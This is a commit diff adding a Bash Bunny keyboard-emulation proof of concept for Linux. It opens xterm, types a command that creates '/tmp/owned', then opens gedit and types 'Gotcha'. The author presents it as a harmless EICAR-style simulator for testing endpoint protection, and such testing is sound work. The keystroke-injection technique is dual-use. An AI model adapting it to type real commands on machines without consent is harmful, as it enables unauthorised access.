Proof-of-concept added: EICAR of bash bunny HID simulation for Linux (#298)

payloads/library/poc/LINUX_HID/README.md

@@ -0,0 +1,25 @@
+# Linux HID poc
+
+Author: Thorsten Sick
+
+Version: 0.9
+
+OS: Linux
+
+Attackmode: HID
+
+IOC: gedit started, file created ('/tmp/owned')
+
+Category: POC
+
+## Description
+
+Uses HID (keyboard) to start an xterm and create the file '/tmp/owned'. After that it starts gedit and writes 'Gotcha'
+
+## Status
+
+|LED|Status|
+|-|-|
+|SETUP (Magenta solid)|Not much setup needed|
+|ATTACK (Yellow single blink)|attack: start xterm and gedit|
+|FINISH (Green 1000ms VERYFAST blink followed by SOLID)|Done|

payloads/library/poc/LINUX_HID/payload.txt

@@ -0,0 +1,38 @@
+#!/bin/bash
+#
+# Title: LINUX HID POC
+# Description: Payload to test protection technology
+# Original Author: Thorsten Sick
+# Version: 0.9
+# Category: POC
+# Target: Linux
+# Attackmodes: HID
+#
+#
+# To test detection technolgy a malware-simulator is needed.
+# Criteria:
+# - one trick pony - no side effects
+# - simple to test with (ui and file system markers left)
+# - non-destructive/invasive
+# "This is the eicar for bash bunny"
+
+
+#init
+LED SETUP
+ATTACKMODE HID
+
+# attack
+LED ATTACK
+RUN UNITY xterm
+Q DELAY 1000
+Q STRING touch /tmp/owned
+Q ENTER
+Q STRING exit
+Q ENTER
+RUN UNITY gedit
+Q DELAY 1000
+Q STRING Gotcha
+
+# finish
+
+LED FINISH

payloads/library/poc/README.md

@@ -0,0 +1,12 @@
+# Proof of concepts and malware simulators
+
+The payloads contained in here are to test protection technology.
+
+"The Eicar of BashBunny attacks"
+
+Criteria:
+- one trick pony, as simple as possible
+- the essence of one attack
+- no side effects
+- simple to test with (ui and file system markers left by attack)
+- non-destructive/invasive